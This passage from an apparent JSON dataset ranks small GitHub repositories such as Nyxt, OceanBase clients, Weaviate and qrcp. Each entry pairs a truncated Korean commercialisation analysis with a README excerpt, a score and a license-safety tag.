src=\"https://nyxt-browser.com/static/image/nyxt_256x256.png\" align=\"right\"/>\n\n*Nyxt* [nýkst] is a keyboard-driven web browser designed for hackers.  Inspired by\nEmacs and Vim, it has familiar keybindings ([[https://en.wikipedia.org/wiki/Emacs][Emacs]], [[https://en.wikipedia.org/wiki/Vim_(text_editor)][vi]], [[https://en.wikipedia.org/wiki/IBM_Common_User_Access][CUA]]), and is infinitely\nextensible in Lisp.\n\n*Attention:* Nyxt is under active development.  Please feel free to [[https://github.com/atlas-engineer/nyxt/issues][report]] bugs,\ninstabilities or feature wishes.\n\n-----\n\n* Features\nFor an exhaustive description of all of the features, please refer to the\nmanual.\n\n** Fast tab switching\n\nSwitch easily between your open tabs via fuzzy search.  If you are looking for\n~https://www.example.com~, you could type in ~ele~, ~exa~, ~epl~, or any other\nmatching series of letters.\n\n#+html: <img src=\"https://nyxt-browser.com/static/image/switch-buffer.png\" align=\"","composite_score":0.052,"license_safety_tag":"unknown"},{"name":"oceanbase/obconnector-c","github_url":"https://github.com/oceanbase/obconnector-c","stars":11,"language":"C","license":"LGPL-2.1","abandonment_months":3,"description":"# oceanbase/obconnector-c 분석\n\n## 왜 보물인가\n데이터베이스와 애플리케이션을 연결하는 핵심 기술로, 대규모 데이터를 다루는 기업들이 반드시 필요로 하는 인프라 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **금융사 데이터 관리 SaaS**: 은행/보험사의 대규모 거래 데이터를 빠르게 처리하는 클라우드 서비스로 제공\n2. **전자","readme_excerpt":"<p align=\"center\">\n  <a href=\"\">\n    <img src=\"https://gw.alipayobjects.com/zos/bmw-prod/d6c1a0b7-c714-4429-8a33-2b394a5c1bf1.svg\">\n  </a>\n</p>\n\n# Oceanbase Client for C\nOceanBase Client for C is a  driver used to connect applications developed in C to OceanBase Database Server.\n\n# Compatibility\n## Server Compatibility\nOceanBase Client for C is compatible with all OceanBase Database Server versions.\n## C Compatibility\nOceanBase Client for C is developed based on gcc 4.8.5, please confirm your gcc version.\n## Obtaining the driver\n**For users who upgrade from version prior to 2.0.0.**\n**You can use the build.sh script to compile it all by yourself.**\n## Documentation\nFor more information about this project, please refer to: \n* [About OceanBase](https://www.oceanbase.com/)\n* [OceanBase documents](https://www.oceanbase.com/docs)\n## License\n\nDistributed under the LGPL License. See `LICENSE` for more information.\n## Acknowledgement\n\nOceanBase Connector/C was ported from MariaDB Connector/C w","composite_score":0.052,"license_safety_tag":"restricted"},{"name":"cipchk/ng-alain","github_url":"https://github.com/cipchk/ng-alain","stars":6,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# ng-alain 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들 수 있는 설계도 모음으로, 개발 시간과 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 관리 대시보드나 분석 도구를 신속하게 구축하는 기반\n- **내부 업무 도구**: 회사 직원들이 사용하는 주문 관리, 재고 관리 시스템\n- **","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://ng-alain.com\">\n    <img width=\"100\" src=\"https://ng-alain.com/assets/img/logo-color.svg\">\n  </a>\n</p>\n\n<h1 align=\"center\">NG-ALAIN</h1>\n\n<div align=\"center\">\n  Out-of-box UI solution for enterprise applications, Let developers focus on business.\n\n  [![CI](https://github.com/ng-alain/ng-alain/actions/workflows/ci.yml/badge.svg)](https://github.com/ng-alain/ng-alain/actions/workflows/ci.yml)\n  [![Dependency Status](https://david-dm.org/ng-alain/ng-alain/status.svg?style=flat-square)](https://david-dm.org/ng-alain/ng-alain)\n  [![GitHub Release Date](https://img.shields.io/github/release-date/ng-alain/ng-alain.svg?style=flat-square)](https://github.com/ng-alain/ng-alain/releases)\n  [![NPM version](https://img.shields.io/npm/v/ng-alain.svg?style=flat-square)](https://www.npmjs.com/package/ng-alain)\n  [![prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg?style=flat-square)](https://prettier.io/)\n  [![GitHub license](https://img.shields","composite_score":0.052,"license_safety_tag":"safe"},{"name":"javapathfinder/jpf-core","github_url":"https://github.com/javapathfinder/jpf-core","stars":7,"language":"Java","license":"unknown","abandonment_months":2,"description":"# JPF-Core 저장소 분석\n\n## 왜 보물인가\n자바 프로그램의 버그를 자동으로 찾아주는 검증 도구로, 소프트웨어 품질 보증이 중요한 금융·의료·항공 등 안전이 중요한 산업에서 매우 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자들이 코드를 업로드하면 자동으로 숨겨진 버그를 검사해주는 온라인 검증 플랫폼\n2. **내부","readme_excerpt":"# Java PathFinder\n\nAn extensible software model checking framework for Java bytecode programs\n\n## General Information about JPF\n\nAll the latest developments, changes, documentation can be found on our\n[wiki](https://github.com/javapathfinder/jpf-core/wiki) page.\n\n## Building and Installing\n\nIf you are having problems installing and running JPF, please look at the [How\nto install\nJPF](https://github.com/javapathfinder/jpf-core/wiki/How-to-install-JPF) guide.\n\nNote that we have transitioned to OpenJDK with the new version of JPF (for Java 11), so unlike branch `java-8`, the new default version for Java 11 no longer compiles using Oracle's JDK.\n\nWe have documented on the wiki a lot of common problems during the install and\nbuild processes reported by users.  If you are facing any issue, please, make\nsure that we have not addressed it in documentation. Otherwise, feel free to\ncontact us at java-pathfinder@googlegroups.com or open an issue on the Issue\nTracker.\n\n## Documentation\n\nThere is a","composite_score":0.052,"license_safety_tag":"unknown"},{"name":"theniceboy/nvim","github_url":"https://github.com/theniceboy/nvim","stars":5,"language":"Vim Script","license":"unknown","abandonment_months":2,"description":"# theniceboy/nvim 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 자주 사용하는 텍스트 편집기를 개인화된 설정으로 구성한 것으로, 개발 업무 효율을 크게 높일 수 있는 템플릿입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 온보딩 SaaS**: 신입 개발자가 처음 입사할 때 이 설정을 자동으로 설치하게 해주는 구독 서비스\n2. **코딩 교육 ","readme_excerpt":"## <center>The Ultimate NeoVim Config for [Colemak](https://colemak.com/) Users</center>\n<center><a href=\"https://instaboard.page/gh-sponsor\"><img src=\"https://user-images.githubusercontent.com/8187501/232345609-366fd597-8a32-4667-9e80-2487ebe6f7f6.png\" alt=\"Sponsored by Instaboard\"></img></a></center>\n<br/>\n\n<center><img src=\"https://raw.githubusercontent.com/theniceboy/nvim/master/demo.png\"></center>\n\n[中文版](./README_cn.md)\n\nPlease **DO NOT** just copy this configuration folder without really looking at it! Please, at least, read this README file!\n\n<!-- TOC GFM -->\n\n* [Requirements](#requirements)\n* [After Installation, You Need To](#after-installation-you-need-to)\n* [After Installation, You Might Want To](#after-installation-you-might-want-to)\n  - [First of all](#first-of-all)\n  - [For Python Debugger (via `vimspector`)](#for-python-debugger-via-vimspector)\n  - [Config `Python` path](#config-python-path)\n  - [For Taglist:](#for-taglist)\n  - [For FZF](#for-fzf)\n  - [And also...](#and-","composite_score":0.0519,"license_safety_tag":"unknown"},{"name":"cjbarber/ToolsOfTheTrade","github_url":"https://github.com/cjbarber/ToolsOfTheTrade","stars":6,"language":"","license":"NOASSERTION","abandonment_months":0,"description":"# ToolsOfTheTrade 저장소 분석\n\n## 왜 보물인가\n개발자들이 일상적으로 필요한 유용한 도구와 자료를 한곳에 모아놓은 '일하는 사람들의 비결 노트'입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼**: 추천 도구를 정리하는 SaaS 서비스로, 매월 구독료를 받고 큐레이션된 도구 목록 제공\n2. **기업 내부 효율성 플랫폼**:","readme_excerpt":"# Hacker News Tools of the Trade [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f3/media/badge.svg)](https://github.com/sindresorhus/awesome)\n\n> Tools of The Trade, from [Hacker News](https://news.ycombinator.com).\n\n##### Background\n\nIn 2010, Joshua Schachter, the founder of Delicious, [posted the following](https://news.ycombinator.com/item?id=1769910) on Hacker News:\n\n> When I first started delicious, we had to host most of the services ourselves. CVS, mail, mailing lists, etc etc etc.\n>\n> These days, lots of that stuff is available as SaaS. What are the tools and services people use instead of hosting their own?\n>\n> (I'm not talking about actual production services like EC2 and Heroku and whatnot. We can go over this in another thread.)\n\nIn 2013, Sharjeel Qureshi, [posted the following](https://news.ycombinator.com/item?id=5235137):\n\n> Few years ago, Joshua Schachter started this thread on HN for discussing hosted useful services: https://news.ycombinator.com/item?id=1","composite_score":0.0518,"license_safety_tag":"unknown"},{"name":"bisq-network/exchange","github_url":"https://github.com/bisq-network/exchange","stars":5,"language":"Java","license":"agpl-3.0","abandonment_months":0,"description":"# Bisq Network Exchange 저장소 분석\n\n## 왜 보물인가\n중앙 관리자 없이 개인들이 직접 암호화폐를 거래할 수 있는 분산형 거래소 기술로, 금융 검열에 자유로운 새로운 거래 방식을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n1. **암호화폐 거래 플랫폼 SaaS**: 소규모 거래소 운영사들이 이 기술을 임대해 자신의 거래소 서비스를 런칭할 ","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://bisq.network\">\n    <img src=\"https://bisq.network/images/bisq-logo.svg\"/>\n  </a>\n</p>\n\n<h3 align=\"center\">\n    \n![Actions Status](https://github.com/bisq-network/bisq/workflows/Build%20Bisq/badge.svg) ![Downloads Count](https://img.shields.io/github/downloads/bisq-network/bisq/total.svg)\n\n\n## What is Bisq?\n\nBisq is a safe, private and decentralized way to exchange bitcoin for national currencies and other digital assets. Bisq uses peer-to-peer networking and multi-signature escrow to facilitate trading without a third party. Bisq is non-custodial and incorporates a human arbitration system to resolve disputes.\n\nTo learn more, see the doc and video at https://bisq.network/intro.\n\n\n## Get started using Bisq\n\nFollow the step-by-step instructions at https://bisq.network/get-started.\n\n\n## Contribute to Bisq\n\nSee [CONTRIBUTING.md](CONTRIBUTING.md) and the [developer docs](docs/README.md).\n","composite_score":0.0517,"license_safety_tag":"risky"},{"name":"cburgmer/rasterizeHTML.js","github_url":"https://github.com/cburgmer/rasterizeHTML.js","stars":5,"language":"JavaScript","license":"mit","abandonment_months":4,"description":"# rasterizeHTML.js 분석 리포트\n\n## 왜 보물인가\n웹페이지를 이미지나 PDF로 변환하는 기술로, 온라인 문서를 인쇄 가능한 형태로 만들어야 하는 많은 비즈니스에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 청구서/보고서 자동 생성 SaaS**\n- 고객이 작성한 웹 기반 송장, 급여명세서, 보고서를 PDF로 자동 변환해 메일 발송","readme_excerpt":"rasterizeHTML.js\n================\n\n<a href=\"https://www.npmjs.org/package/rasterizehtml\">\n    <img src=\"https://badge.fury.io/js/rasterizehtml.svg\"\n        align=\"right\" alt=\"NPM version\" height=\"18\">\n</a>\n\nRenders HTML into the browser's canvas.\n\nSee the [API](https://github.com/cburgmer/rasterizeHTML.js/wiki/API).\n\n\nInstall\n-------\n\n    $ npm install rasterizehtml\n\nThen include a script tag with `node_modules/rasterizehtml/dist/rasterizeHTML.allinone.js` or require through [browserify](https://github.com/substack/node-browserify).\n\nExample\n-------\n\n```js\nvar canvas = document.getElementById(\"canvas\");\nrasterizeHTML.drawHTML('Some ' +\n                       '<span style=\"color: green; font-size: 20px;\">HTML</span>' +\n                       ' with an image <img src=\"someimg.png\">',\n                       canvas);\n```\n\nSee [the examples page](https://github.com/cburgmer/rasterizeHTML.js/wiki/Examples). The code also [ships with examples](https://github.com/cburgmer/rasterizeHTML.js/tree","composite_score":0.0517,"license_safety_tag":"safe"},{"name":"oceanbase/obclient","github_url":"https://github.com/oceanbase/obclient","stars":28,"language":"C++","license":"GPL-2.0","abandonment_months":3,"description":"# OceanBase OBClient 분석 보고서\n\n## 왜 보물인가\n대규모 데이터를 빠르게 처리해야 하는 금융·전자상거래 기업들이 필수적으로 사용하는 데이터베이스 접근 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (데이터 분석 플랫폼)**\n- 기업 고객의 방대한 거래 데이터를 안전하게 연결하고 분석할 수 있는 클라우드 대시보드 서비스","readme_excerpt":"# OBClient overview\n\nOceanBase Client (OBClient) is a client tool developed based on MariaDB-CLI, which can be used to connect to OceanBase Server/Proxy. OBClient is licensed under the General Public License (GPL).\n\nOBClient depends on LibobClient. LibobClient is an OceanBase C API Lib library developed based on MariaDB Connector/C. LibobClient allows C/C++ programs to access OceanBase clusters from the underlying layer. LibobClient supports the latest data model of OceanBase Database. It is licensed under the Lesser General Public License (LGPL).\n\n## Obtain OBClient\n\nYou can obtain OBClient in the following two ways.\n\n## Obtain OBClient from the YUM repository\n\n```shell\n# Add the YUM repository.\nsudo yum install -y yum-utils\nsudo yum-config-manager \\\n   --add-repo \\\n  https://mirrors.aliyun.com/oceanbase/OceanBase.repo\n   \n# Install OBClient.\nsudo yum install obclient\n```\n\n### Build OBClient from the source code\n\n```shell\nyum install -y git cmake gcc make openssl-devel ncurses-devel r","composite_score":0.0516,"license_safety_tag":"restricted"},{"name":"coderQuad/New-Grad-Positions-2022","github_url":"https://github.com/coderQuad/New-Grad-Positions-2022","stars":11,"language":"","license":"unknown","abandonment_months":0,"description":"# New-Grad-Positions-2022 분석\n\n## 왜 보물인가\n새로 졸업한 대학생들이 입사지원할 수 있는 회사 채용정보를 한곳에 모아놓은 자료로, 취업준비생들의 시간을 크게 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **취업정보 플랫폼**: 새로운 졸업자 채용정보 전용 웹사이트를 만들어 구직자에게 체계적으로 제공\n2. **대학 커리어센","readme_excerpt":"# 2026 New Grad Positions by Coder Quad and Simplify\n\nUse this repo to share and keep track of entry-level software, tech, CS, PM, quant jobs for 2025 & 2026 new graduates. The list is updated and maintained daily by Coder Quad and [Simplify](https://simplify.jobs/?utm_source=GHList&utm_medium=title)!\n\n🙏 **Contribute by submitting an [issue](https://github.com/SimplifyJobs/New-Grad-Positions/issues/new/choose)! See the contribution guidelines [here](./CONTRIBUTING.md)!** 🙏\n\n---\n### Browse 291 New Grad Roles by Category\n\n💻 **[Software Engineering](#-software-engineering-new-grad-roles)** (179)\n\n📱 **[Product Management](#-product-management-new-grad-roles)** (5)\n\n🤖 **[Data Science, AI & Machine Learning](#-data-science-ai--machine-learning-new-grad-roles)** (50)\n\n📈 **[Quantitative Finance](#-quantitative-finance-new-grad-roles)** (5)\n\n🔧 **[Hardware Engineering](#-hardware-engineering-new-grad-roles)** (52)\n\n💼 **[Other](#-other-new-grad-roles)** (0)\n\n---\n\n<div align=\"center\">\n  <h3>😫 Hate","composite_score":0.0516,"license_safety_tag":"unknown"},{"name":"alibaba/kiwi","github_url":"https://github.com/alibaba/kiwi","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":4,"description":"# Alibaba/Kiwi 저장소 분석\n\n## 왜 보물인가\n알리바바가 만든 기술이지만 아직 주목받지 못한 숨겨진 프로젝트로, 개발되고 있는 상태라 초기 진입 기회가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들이 자신의 데이터를 더 잘 분석하고 정리하는 웹 서비스로 제공\n2. **내부 업무 도구**: 회사 직원들이 일할 때 복","readme_excerpt":"<div align=\"center\">\n  <img src=\"https://img.alicdn.com/tfs/TB1wHaqyYGYBuNjy0FoXXciBFXa-512-512.svg\" height=\"64\">\n  <h2>🐤 Kiwi-国际化全流程解决方案</h2>\n</div>\n\n中文 | [English](https://github.com/alibaba/kiwi/blob/master/README-en.md)\n\n## 如何使用\n\n> yarn global add kiwi-clis && yarn add kiwi-intl\n\n> VS Code 插件搜索 kiwi linter 安装\n\n## 功能演示\n\n- 一键提取中文文案\n![提取文案](https://camo.githubusercontent.com/826598e27116fd0fb0b0931fc60ffbebecaa0075/68747470733a2f2f696d672e616c6963646e2e636f6d2f7466732f5442314559454e66546e49384b4a6a79304666585863646f5658612d313030362d3336382e676966)\n\n- 检测代码中含有中文文案\n![中文文案检测](https://camo.githubusercontent.com/8a537d1c20e689087ef6a0035761e3048f820852/68747470733a2f2f696d672e616c6963646e2e636f6d2f7466732f54423143485a527278475942754e6a7930466e585858356c7058612d313038382d3536382e706e67)\n\n- 搜索对应文案\n![文案搜索](https://camo.githubusercontent.com/c7385ffa640bcdd8c7e8037abd0e920f4b22e8dd/68747470733a2f2f696d672e616c6963646e2e636f6d2f7466732f544231647a663872704f5742754e6a7930466958585846785658612d313","composite_score":0.0516,"license_safety_tag":"unknown"},{"name":"semi-technologies/weaviate","github_url":"https://github.com/semi-technologies/weaviate","stars":7,"language":"Go","license":"BSD-3-Clause","abandonment_months":0,"description":"# Weaviate 프로젝트 분석\n\n## 왜 보물인가\n대량의 데이터에서 원하는 정보를 빠르고 정확하게 찾아주는 똑똑한 검색 엔진을 직접 만들어 판매할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업의 문서 관리 시스템이나 고객 지원팀을 위한 지능형 검색 플랫폼 제공\n2. **내부 업무 도구**: 대규모 데이터를 보유한 ","readme_excerpt":"# Weaviate <img alt='Weaviate logo' src='https://weaviate.io/img/site/weaviate-logo-light.png' width='148' align='right' />\n\n[![GitHub Repo stars](https://img.shields.io/github/stars/weaviate/weaviate?style=social)](https://github.com/weaviate/weaviate)\n[![Go Reference](https://pkg.go.dev/badge/github.com/weaviate/weaviate.svg)](https://pkg.go.dev/github.com/weaviate/weaviate)\n[![Build Status](https://github.com/weaviate/weaviate/actions/workflows/.github/workflows/pull_requests.yaml/badge.svg?branch=main)](https://github.com/weaviate/weaviate/actions/workflows/.github/workflows/pull_requests.yaml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/weaviate/weaviate)](https://goreportcard.com/report/github.com/weaviate/weaviate)\n[![Coverage Status](https://codecov.io/gh/weaviate/weaviate/branch/main/graph/badge.svg)](https://codecov.io/gh/weaviate/weaviate)\n\n**Weaviate** is an open-source, cloud-native vector database that stores both objects and vectors, enabling semantic se","composite_score":0.0515,"license_safety_tag":"safe"},{"name":"claudiodangelis/qrcp","github_url":"https://github.com/claudiodangelis/qrcp","stars":6,"language":"Go","license":"MIT","abandonment_months":2,"description":"# qrcp 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 카메라로 QR코드를 찍으면 파일을 바로 받을 수 있는 간단한 파일 공유 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 파일 공유 플랫폼에 QR코드 기능을 추가하여 복잡한 로그인 없이 빠른 공유 제공\n- **내부 업무 도구**: 사무실에서 직원들이 스마트폰으로 컴퓨터의 파일을","readme_excerpt":"![Logo](docs/img/logo.svg)\n\n# $ qrcp\n\nTransfer files over Wi-Fi from your computer to a mobile device by scanning a QR code without leaving the terminal.\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/claudiodangelis/qrcp)](https://goreportcard.com/report/github.com/claudiodangelis/qrcp)\n\nJoin the **Telegram channel** [qrcp_dev](https://t.me/qrcp_dev) or the [@qrcp_dev](https://twitter.com/qrcp_dev) **Twitter account** for news about the development.\n\n---\n\n## How does it work?\n\n![Screenshot](docs/img/screenshot.png)\n\n`qrcp` binds a web server to the address of your Wi-Fi network interface on a random port and creates a handler for it. The default handler serves the content and exits the program when the transfer is complete. When used to receive files, `qrcp` serves an upload page and handles the transfer.\n\nThe tool prints a QR code that encodes the text:\n\n```\nhttp://{address}:{port}/{random_path}\n```\n\nMost QR apps can detect URLs in decoded text and act accordingly (i.e","composite_score":0.0514,"license_safety_tag":"safe"},{"name":"shelljs/shelljs","github_url":"https://github.com/shelljs/shelljs","stars":5,"language":"JavaScript","license":"bsd-3-clause","abandonment_months":1,"description":"# ShellJS 저장소 분석\n\n## 왜 보물인가\n컴퓨터 작업을 자동화하는 도구로, 반복되는 일들을 프로그램이 대신하게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 자동화 플랫폼으로, 고객들이 웹 인터페이스에서 반복 작업을 자동 실행하도록 제공\n2. **내부 업무 도구**: 회사의 배포, 백업, 파일 관리 같","readme_excerpt":"# ShellJS - Unix shell commands for Node.js\n\n[![GitHub Actions](https://img.shields.io/github/actions/workflow/status/shelljs/shelljs/main.yml?style=flat-square&logo=github)](https://github.com/shelljs/shelljs/actions/workflows/main.yml)\n[![Codecov](https://img.shields.io/codecov/c/github/shelljs/shelljs/main.svg?style=flat-square&label=coverage)](https://codecov.io/gh/shelljs/shelljs)\n[![npm version](https://img.shields.io/npm/v/shelljs.svg?style=flat-square)](https://www.npmjs.com/package/shelljs)\n[![npm downloads](https://img.shields.io/npm/dm/shelljs.svg?style=flat-square)](https://www.npmjs.com/package/shelljs)\n\nShellJS is a portable **(Windows/Linux/macOS)** implementation of Unix shell\ncommands on top of the Node.js API. You can use it to eliminate your shell\nscript's dependency on Unix while still keeping its familiar and powerful\ncommands. You can also install it globally so you can run it from outside Node\nprojects - say goodbye to those gnarly Bash scripts!\n\nShellJS is proud","composite_score":0.0512,"license_safety_tag":"safe"},{"name":"dashbitco/broadway_dashboard","github_url":"https://github.com/dashbitco/broadway_dashboard","stars":9,"language":"Elixir","license":"Apache-2.0","abandonment_months":3,"description":"# Broadway Dashboard 분석\n\n## 왜 보물인가\n실시간으로 데이터 흐름을 시각적으로 모니터링할 수 있는 대시보드로, 기술팀이 시스템 상태를 한눈에 파악하고 문제를 빠르게 해결할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데이터 처리 회사가 고객사에 제공하는 실시간 모니터링 대시보드\n2. **내부 업무 도구*","readme_excerpt":"# Broadway Dashboard\n\n[Online documentation](https://hexdocs.pm/broadway_dashboard)\n\n<!-- MDOC !-->\n\n`BroadwayDashboard` is a tool to analyze [`Broadway`](https://hexdocs.pm/broadway)\npipelines. It provides some insights about performance and errors for\nyour running pipelines.\n\nIt works as an additional page for the [`Phoenix LiveDashboard`](https://hexdocs.pm/phoenix_live_dashboard).\n\nYou can inspect pipelines on remote nodes that are not running `BroadwayDashboard` too.\nSee [Distribution](#distribution) for details.\n\n![Broadway Dashboard](https://raw.githubusercontent.com/dashbitco/broadway_dashboard/4da2a5f388a7579d41b63803652796c106b74785/priv/static/broadway-dashboard-01.gif)\n\n## Integration with Phoenix LiveDashboard\n\nYou can add this page to your Phoenix LiveDashboard by adding as a page in\nthe `live_dashboard` macro at your router file.\n\n```elixir\nlive_dashboard \"/dashboard\",\n  additional_pages: [\n    broadway: {BroadwayDashboard, pipelines: [MyBroadway]}\n  ]\n```\n\nThe `:pipelin","composite_score":0.051,"license_safety_tag":"safe"},{"name":"WayLearnLatam/Biblioteca-Solana","github_url":"https://github.com/WayLearnLatam/Biblioteca-Solana","stars":22,"language":"Rust","license":"NOASSERTION","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.0509,"license_safety_tag":"unknown"},{"name":"php-fig/log","github_url":"https://github.com/php-fig/log","stars":11,"language":"PHP","license":"mit","abandonment_months":4,"description":"# php-fig/log 분석 리포트\n\n## 왜 보물인가\n웹사이트나 앱에서 발생하는 모든 문제를 기록하고 추적할 수 있는 표준 방식을 정해놓은 것으로, 업계 전문가들이 함께 만든 공식 규칙입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (고객 관리 클라우드 도구)**\n- 고객들의 시스템 사용 기록과 오류를 일관되게 저장하고 분석할 수 있습니다","readme_excerpt":"PSR Log\n=======\n\nThis repository holds all interfaces/classes/traits related to\n[PSR-3](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-3-logger-interface.md).\n\nNote that this is not a logger of its own. It is merely an interface that\ndescribes a logger. See the specification for more details.\n\nInstallation\n------------\n\n```bash\ncomposer require psr/log\n```\n\nUsage\n-----\n\nIf you need a logger, you can use the interface like this:\n\n```php\n<?php\n\nuse Psr\\Log\\LoggerInterface;\n\nclass Foo\n{\n    private $logger;\n\n    public function __construct(LoggerInterface $logger = null)\n    {\n        $this->logger = $logger;\n    }\n\n    public function doSomething()\n    {\n        if ($this->logger) {\n            $this->logger->info('Doing work');\n        }\n           \n        try {\n            $this->doSomethingElse();\n        } catch (Exception $exception) {\n            $this->logger->error('Oh no!', array('exception' => $exception));\n        }\n\n        // do something useful\n    }\n}\n`","composite_score":0.0509,"license_safety_tag":"safe"},{"name":"ONLYOFFICE/AppServer","github_url":"https://github.com/ONLYOFFICE/AppServer","stars":12,"language":"","license":"AGPL-3.0","abandonment_months":3,"description":"# ONLYOFFICE/AppServer 상용화 분석\n\n## 왜 보물인가\n마이크로소프트 오피스처럼 문서 작성·편집을 웹에서 바로 할 수 있는 서버 기술이라, 기업들이 자신의 시스템에 내장하여 팔 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 프로젝트 관리 도구에 문서 편집 기능을 내장하여 사용자가 별도 프로그램 없이","readme_excerpt":"﻿# ONLYOFFICE DocSpace\n\n<p align=\"center\">\n  <a href=\"https://www.onlyoffice.com/docspace?utm_source=github&utm_medium=cpc&utm_campaign=GitHubDocSpace\">\n    <img width=\"840\" src=\"https://static-site.onlyoffice.com/public/images/outer/docspace.png\" alt=\"ONLYOFFICE DocSpace\">\n  </a>\n</p>\n\n## **💡 What is DocSpace?**\n\nWelcome to the official GitHub repository for [**ONLYOFFICE DocSpace**](https://www.onlyoffice.com/docspace?utm_source=github&utm_medium=cpc&utm_campaign=GitHubDocSpace)!\n\nDocSpace is a secure, collaborative platform that allows you to create flexible, room-based environments to store, share, and co-author documents of any kind. \n\nWhether you're working with your team, clients, or partners, DocSpace provides the tools you need to get work done efficiently and securely.\n\n**[Start with a free account ↗](https://www.onlyoffice.com/docspace-registration?utm_source=github&utm_medium=cpc&utm_campaign=GitHubDocSpace)**\n\nThis repository contains the source code for the backend and fr","composite_score":0.0508,"license_safety_tag":"risky"},{"name":"hay-kot/mealie","github_url":"https://github.com/hay-kot/mealie","stars":11,"language":"Python","license":"AGPL-3.0","abandonment_months":0,"description":"# Mealie 프로젝트 분석\n\n## 왜 보물인가\n자신의 레시피와 식단을 한 곳에서 관리하고 쇼핑 목록까지 자동으로 만들어주는 개인용 요리 관리 시스템입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독료를 받고 온라인에서 레시피를 저장·공유하는 플랫폼으로 운영\n- **내부 업무 도구**: 식당, 카페, 급식소에서 직원들이 메뉴 관리와 ","readme_excerpt":"[![Latest Release][latest-release-shield]][latest-release-url]\n[![Contributors][contributors-shield]][contributors-url]\n[![Stargazers][stars-shield]][stars-url]\n[![Issues][issues-shield]][issues-url]\n[![AGPL License][license-shield]][license-url]\n[![Docker Pulls][docker-pull]][docker-url]\n[![GHCR Pulls][ghcr-pulls]][ghcr-url]\n\n<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/mealie-recipes/mealie\">\n<svg style=\"width:100px;height:100px\" viewBox=\"0 0 24 24\">\n    <path fill=\"currentColor\" d=\"M8.1,13.34L3.91,9.16C2.35,7.59 2.35,5.06 3.91,3.5L10.93,10.5L8.1,13.34M13.41,13L20.29,19.88L18.88,21.29L12,14.41L5.12,21.29L3.71,19.88L13.36,10.22L13.16,10C12.38,9.23 12.38,7.97 13.16,7.19L17.5,2.82L18.43,3.74L15.19,7L16.15,7.94L19.39,4.69L20.31,5.61L17.06,8.85L18,9.81L21.26,6.56L22.18,7.5L17.81,11.84C17.03,12.62 15.77,12.62 15,11.84L14.78,11.64L13.41,13Z\" />\n</svg>\n  </a>\n\n  <h3 align=\"center\">Mealie</h3>\n\n  <p align=\"center\">\n    A Place For All Your Recipes\n    <br />\n ","composite_score":0.0506,"license_safety_tag":"risky"},{"name":"yampiihansLab/hyperliquid-copy-trading-bot","github_url":"https://github.com/yampiihansLab/hyperliquid-copy-trading-bot","stars":226,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0504,"license_safety_tag":"unknown"},{"name":"juliandavidmr/awesome-nestjs","github_url":"https://github.com/juliandavidmr/awesome-nestjs","stars":6,"language":"","license":"unknown","abandonment_months":1,"description":"# Awesome NestJS 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르고 안정적으로 만드는 데 필요한 도구들과 학습 자료를 한곳에 모아놓은 것이 이 저장소의 가치입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 구독형 프로젝트 관리 도구나 협업 플랫폼의 백엔드 기술로 활용\n- **내부 업무 도구**: 직원 데이터 관리, 매출 추","readme_excerpt":"<!--lint disable awesome-list-item-->\n<div align=\"center\">\n  <p align=\"center\">\n    <a href=\"http://nestjs.com/\" target=\"blank\"><img src=\"https://nestjs.com/img/logo-small.svg\" width=\"200\" alt=\"Nest Logo\" /></a>\n  </p>\n<h1>Awesome NestJS</h1>\n<p>A curated list of awesome things related to NestJS</p>\n\n<a href=\"#resources\">Resources</a>\n&nbsp;&nbsp;&nbsp;\n<a href=\"CONTRIBUTING.md\">Contribution guide</a>\n&nbsp;&nbsp;&nbsp;\n<a href=\"https://docs.nestjs.com\">Official documentation</a>\n\n  <a href=\"https://awesome.re\">\n    <img src=\"https://awesome.re/badge.svg\" alt=\"Awesome\">\n  </a>\n</div>\n\n## Contents <!-- omit in toc -->\n\n- [Resources](#resources)\n- [Projects using NestJS](#projects-using-nestjs)\n- [Components & Libraries](#components--libraries)\n- [Testing](#testing)\n- [Integrations](#integrations)\n- [Runtime](#runtime)\n- [Meetups](#meetups)\n- [Contribute](#contribute)\n- [License](#license)\n\n<!--lint enable awesome-list-item-->\n\n## Resources\n\n#### Official Resources\n\n- 